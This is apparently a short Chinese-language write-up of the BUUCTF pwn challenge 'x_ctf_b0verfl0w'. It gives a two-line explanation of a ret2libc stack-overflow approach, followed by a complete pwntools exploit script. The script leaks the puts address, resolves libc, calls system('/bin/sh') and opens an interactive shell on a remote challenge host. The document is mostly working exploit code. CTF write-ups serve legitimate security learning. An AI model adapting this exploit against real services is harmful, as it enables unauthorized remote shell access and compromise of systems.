[BUUCTF-pwn]——x_ctf_b0verfl0w
很简单的一个ret2libc题型,利用栈溢出,构造循环调用
第一次leek地址,之后就可以构造我们想要的rop链了
exploit
from pwn import *
from LibcSearcher import *
#p = process('./b0verfl0w')
p = remote('node3.buuoj.cn',26806)
elf = ELF('./b0verfl0w')
context.log_level = 'debug'
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
#gdb.attach(p)
payload = 'a' * (0x20 + 4) + p32(puts_plt) +p32(0x0804850E) + p32(puts_got)
p.sendline(payload)
p.recvuntil('.')
puts_addr = u32(p.recv(4))
log.success("puts_addr ----> : " + hex(puts_addr))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
info("libc_base -----> " + hex(libc_base))
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
payload1 = 'a' * (0x20 + 4) + p32(sys_addr) + p32(binsh) + p32(binsh)
p.sendline(payload1)
p.interactive()